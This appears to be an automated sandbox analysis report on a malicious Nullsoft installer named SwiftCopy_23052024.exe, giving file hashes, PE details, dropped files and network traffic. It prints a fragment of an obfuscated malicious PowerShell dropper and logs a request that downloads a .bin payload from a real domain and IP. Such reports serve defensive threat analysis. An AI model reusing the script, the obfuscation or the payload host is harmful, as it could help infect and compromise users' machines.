
Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	ASCII text, with very long lines (52697), with no line terminators
Category:	dropped
Size (bytes):	52697
Entropy (8bit):	5.353129415347462
Encrypted:	false
SSDEEP:	768:SBUpRfcHIhDvxaxaMEoqZXqdI0UBTB4OhlqAAF/xmLOCz/oazIf6zPEefzzWE:SB+oIhDvxoruBT5HzAF/xoO3xeGE
MD5:	3471D919155C6302ABDE2E6943776FC4
SHA1:	6D56D5A255E7352FBFAEE1D0ACDC63F04A391B61
SHA-256:	A69113E9A6F04F138A708080F451C988264C46E026E3BA96726E84C92212D348
SHA-512:	902C291F247A5C9A03A592512AAAADC34B3F24BE7E40AA8234B74D1BB7CEC1474391C8BB20D69F0A218F4410F31357C0BF3C3F927774A9E216563FC8879D93A1
Malicious:	true
Preview:	$Svalingarselorlov=$Svalingucks;<#Ungrassy Pinners Rijsttafelets #><#Savtakket Raffinaderi Grundvandsspejlene Overbooking Haremlik Fondsbrsvekselerernes #><#Mumificeredes Affinitet Gudebarn Mannite Trvrk Wolff #><#Underkendes Joggingudstyrenes Quinquelateral #><#Forskylde Baandmaskinernes Angakoks #><#Anskueligere Temposkiftene Begyndelsestallets Betonet Straal Snaggiest #>$Glyoxime = "Ti fa;Bor fFBrolguBitten Victc BorotKnewiiRevidoSendinBor,i PegmaO rotopFracurYamsku udcl Sla,n,uperiKlynknKonveg ArbesArbej Tisse(Betro`$Shak,MFjolsuNot rlImp.otFerrii L ttpK pehlRenisaKvel,nLa ugtSorts, Ma c Shirr`$SongwSUdfrivBe.ndaFimbrlUdstyi Ligan Undeg Gyn,u scrod roskdSelvrhDeadhiLousesNglenmLov.i Skraa=offic Fritt0Creas) Smld{ Puff.Archi`$ParlaPTr ugaPaahnaT,chilMor eiSprjtd phude UdsalPointi SantgGraniePlurar Ga nePelobsPaleo=Axion- Hete1Let,a4 Na s6 Kap 6Ind.m8 T,it+Tienn1Lrred4 Desi6 verm7 Klic0Tr,be;,jusk H,emk nykol Brady Cutic`$CuffeFUd.ryl .mhyyFengepAmsata UdmasAsto sU enlaMosaigGodeneM

C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes\retsforflgendes.tod

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	4373
Entropy (8bit):	4.88864190543659
Encrypted:	false
SSDEEP:	48:FsSH9rQyxR3+vB9XjOqpvga/O0W2oAQCHWeBfucveE+VtPro3FrVTOE3Pc84zxeu:Fso9hxRuTCZ2/HWfzj83Hxc3vJDF9YS1
MD5:	769A586950947968C2FBC99368DEAAF7
SHA1:	7EED9685BCD8286EB8E89852A71890B758CE01AA
SHA-256:	90D3B049131C3D1B4D73483D0BC10D3DBFB6E1717566D750C08208B6854C3A01
SHA-512:	92089A017C9318C5EBDA4C6A86569E047246AA38D47F4CFDEC5AAE4EF73EEA3924F3E683C1B7411A94CCFC3BDE990C03A9129B70F3C18A2F893A44292DF8B1C5
Malicious:	false
Preview:	......b....#.................P.X..Ay......................~....S.....#,\|....k...4.LBw..........ZX...........1j.............j...C..z.'.......%...........v..$.........p.yEd..~.........z......a...O....H...Q.........5...0...E-...A.'.o....c......W..0...}....>..x...6..........k.....u...1......x.........]...m...A..Ri..4A......7.......O...@..........w.C.....0P.....Y........l...).......4].`..................q...'..................\........."....~j................Y...f+..c...........h............U.)........E....R.P........!.....<.....2....C.....J.......Y....../....Kg.!.Q...i..@G..........o..........[..#........O....bl...........J2....i]..+.L..*..'18......=D.l.f.....v.;.W..............(...C....21...............N.yF.u.........7j..9O........V..................".....D..V.e...........C.............?.........t..P....V.A......<...g7...I._.P.x....~=..............z......y=....k.................i..x..\.......................;.........q...F......>.o.L......+...sVp..3..........A..bk.......

C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes\tankvognskrselens.blu

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	modified
Size (bytes):	2275
Entropy (8bit):	4.930835302559649
Encrypted:	false
SSDEEP:	48:bf8SfPxk2gn5MWX1DBdJbIcLe7D3SV9rE4kY48oMuRsf/VaAKG:bvPx+2WljlWX3SVTkvLNsf9a+
MD5:	1FDD6C1B9F80DAEC534F136FC5813911
SHA1:	FF3CAD59251A6FF5D7F707738E34AEE1F81E7A14
SHA-256:	F6E5D6B9A43820C36D3652102CC2E24FF22DAEF04855C8882D1F84B398AEC59A
SHA-512:	40C1EE584350CC086ACCF02537CDED755D89DFCCBE182BC41C86AD948B63CD4CEEDCA8A15A03A1D73CB6BDA221EADE28A3BFF9FD9AEB2D70633CDC2A3F32E86E
Malicious:	false
Preview:	.Z..._....C.............f..4.................(.;...F.$..Yc."......3......(........F1......t.".k.......f.g[.O.nR.....'..[..7............d......,....._..8.J.gO...........:.........6}..............+...L.....3.......`.............T..Y....{.[....i......j.z..........}..........y.o............E....4O............t........X..g.M........w......\|........0...i............7........................H4.....................r.......................0..n.....-..f......h.0..~.i..CO.............n......N.ZG...r.......l.....A..............`.h3................1..3.../?.....[...[D.x......:2o.4........S..........?.#......x...............P.......e.............Q......Z.....D....A.............q...Y...T.................^6@...#r.)@\|...r............Q8....k...t....q...........v.......j.5.T..}..-......aT....f.\....$.ze........f..."...R..D;3.......]g........[...o.F.+.......0......<......P....y.A..F...V...........Z.......G.....................O..*...A.X.-......w............ .KJ].$.)..o...[(......R..<>..i.m...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.993856068773167
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SwiftCopy_23052024.exe
File size:	558'280 bytes
MD5:	f8a9b82d69416512778ad72015181036
SHA1:	60013bbc382ad1722fc5be5f72188c57e7a4928d
SHA256:	dabc79a064aa9838ad06d11311ff4c72913d9a7e7c1016cc9e12dcc46d474b8a
SHA512:	3cdcb1134407ed915e8b5d7c0a0bc8fa645373f28520abeee85bd68b1f875508b983941077bb2035848d61da1c9607d775b3a6ad9423722fd300ebd8f8ef72e9
SSDEEP:	6144:YY8i9d6ihX1h4r56Nbtd1lQ2S8IljlYhPYjvoJbX6A5RAdFU6ewtC//o5QtWucKf:yK6+lhuy1/3IXIPYjg5Kde8CtWuzaO
TLSH:	E4C401E5FC60CC0FCC244AF04C3992B87B759E6E54E4AE563680B75B797D292A04F329
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........r.../...............+.......Rich............PE..L......].................b....9.....H2............@

File Icon


Icon Hash:	199bb3bf5f4d0d07

Static PE Info

General

Entrypoint:	0x403248
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DF6D4D5 [Mon Dec 16 00:50:29 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e9c0657252137ac61c1eeeba4c021000

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Palliative80@Arbejdsmaade88.Ski, O=Muliggjort, OU="tilbageblikkets Motionlessnesses ", CN=Muliggjort, L=Bielefeld, S=Nordrhein-Westfalen, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	07/08/2023 10:53:42 06/08/2026 10:53:42
Subject Chain	E=Palliative80@Arbejdsmaade88.Ski, O=Muliggjort, OU="tilbageblikkets Motionlessnesses ", CN=Muliggjort, L=Bielefeld, S=Nordrhein-Westfalen, C=DE
Version:	3
Thumbprint MD5:	37B56C3A7D344636BA5BB9AD9C422DB3
Thumbprint SHA-1:	6F998D9526E0CE85B65F59C5C0CA6A1142032441
Thumbprint SHA-256:	D9FB8D736F52B70E96B53EDB7C2372B61412F0C6941846935C5CD8D7C564C59C
Serial:	4907889CD8A7B3111427E64822B43A242BA89859

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A2F4Ch], eax
je 00007F79F14220A3h
push ebx
call 00007F79F142518Bh
cmp eax, ebx
je 00007F79F1422099h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F79F1425107h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F79F142207Dh
push 0000000Ah
call 00007F79F142515Fh
push 00000008h
call 00007F79F1425158h
push 00000006h
mov dword ptr [007A2F44h], eax
call 00007F79F142514Ch
cmp eax, ebx
je 00007F79F14220A1h
push 0000001Eh
call eax
test eax, eax
je 00007F79F1422099h
or byte ptr [007A2F4Fh], 00000040h
push ebp
call dword ptr [00408040h]
push ebx
call dword ptr [00408284h]
mov dword ptr [007A3018h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E508h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8430	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b3000	0x28608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x87a50	0xa78	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x294	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x60d8	0x6200	e59663060e65803bb6474d2af98f8aa9	False	0.6750637755102041	data	6.467400856752681	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x123e	0x1400	7969015d02b2f673463f43156b28cdb4	False	0.428515625	data	5.032652926909017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x399058	0x400	2d383339e780dfc9691f30584bbd0766	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a4000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b3000	0x28608	0x28800	ede5a8755ab4c8277abbf0838590eb8a	False	0.21144989390432098	data	3.2566612538812296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b3388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.1756624866911156
RT_ICON	0x3c3bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2090866092074837
RT_ICON	0x3cd058	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.2295286506469501
RT_ICON	0x3d24e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.22461029759093057
RT_ICON	0x3d6708	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.27323651452282155
RT_ICON	0x3d8cb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.299718574108818
RT_ICON	0x3d9d58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.375
RT_ICON	0x3da6e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.44680851063829785
RT_DIALOG	0x3dab48	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3dac90	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3dadb0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3daed0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3daf98	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3daff8	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x3db070	0x258	data	English	United States	0.49833333333333335
RT_MANIFEST	0x3db2c8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll	SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 15:21:29.877151966 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:29.877254009 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:29.877351999 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:29.888703108 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:29.888746023 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:32.200793028 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:32.200933933 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:32.243031025 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:32.243077993 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:32.244808912 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:32.244875908 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:32.249106884 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:32.290503979 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.310491085 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.310524940 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.310544968 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.310605049 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.310636997 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.310648918 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.310694933 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.346153975 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.346213102 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.346283913 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.346312046 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.346326113 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.346344948 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.767242908 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.767261982 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.767282963 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.767328024 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.767359018 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.767371893 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.767400026 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.787442923 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.787466049 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.787518024 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.787527084 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.787549019 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.787569046 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.803497076 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.803517103 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.803563118 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.803580046 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.803595066 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.803625107 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.860192060 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.860215902 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.860286951 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.860316992 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:33.860331059 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:33.860378981 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.238234043 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.238253117 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.238272905 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.238404989 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.238430977 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.238485098 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.251156092 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.251187086 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.251331091 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.251338005 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.251384974 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.259875059 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.259905100 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.260030985 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.260035038 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.260077000 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.268131971 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.268163919 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.268306017 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.268332958 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.268378973 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.275640011 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.275679111 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.275882959 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.275882959 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.275909901 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.275962114 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.690819979 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.690859079 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.690906048 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.690923929 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.690968037 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.690979958 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.690984964 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.691026926 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.691709042 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.698137999 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.698169947 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.698227882 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.698240042 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.698272943 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.698291063 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.709985018 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.710002899 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.710071087 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.710078955 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.710225105 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.714670897 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.714685917 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.714762926 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.714776039 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.714821100 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.720304012 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.720319986 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.720372915 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.720383883 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.720428944 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723104954 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.723159075 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723165035 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.723196983 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723206043 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.723249912 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723277092 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723294020 CEST	443	49706	103.21.58.98	192.168.2.7
May 23, 2024 15:21:34.723311901 CEST	49706	443	192.168.2.7	103.21.58.98
May 23, 2024 15:21:34.723337889 CEST	49706	443	192.168.2.7	103.21.58.98

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 15:21:28.635077000 CEST	53474	53	192.168.2.7	1.1.1.1
May 23, 2024 15:21:29.641597986 CEST	53474	53	192.168.2.7	1.1.1.1
May 23, 2024 15:21:29.871459961 CEST	53	53474	1.1.1.1	192.168.2.7
May 23, 2024 15:21:29.876229048 CEST	53	53474	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 15:21:28.635077000 CEST	192.168.2.7	1.1.1.1	0x7296	Standard query (0)	www.innovativebuildingsolutions.in	A (IP address)	IN (0x0001)	false
May 23, 2024 15:21:29.641597986 CEST	192.168.2.7	1.1.1.1	0x7296	Standard query (0)	www.innovativebuildingsolutions.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 15:21:29.871459961 CEST	1.1.1.1	192.168.2.7	0x7296	No error (0)	www.innovativebuildingsolutions.in	innovativebuildingsolutions.in		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 15:21:29.871459961 CEST	1.1.1.1	192.168.2.7	0x7296	No error (0)	innovativebuildingsolutions.in		103.21.58.98	A (IP address)	IN (0x0001)	false
May 23, 2024 15:21:29.876229048 CEST	1.1.1.1	192.168.2.7	0x7296	No error (0)	www.innovativebuildingsolutions.in	innovativebuildingsolutions.in		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 15:21:29.876229048 CEST	1.1.1.1	192.168.2.7	0x7296	No error (0)	innovativebuildingsolutions.in		103.21.58.98	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.innovativebuildingsolutions.in

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49706	103.21.58.98	443	2020	C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:21:32 UTC	239	OUT	GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.innovativebuildingsolutions.in Cache-Control: no-cache
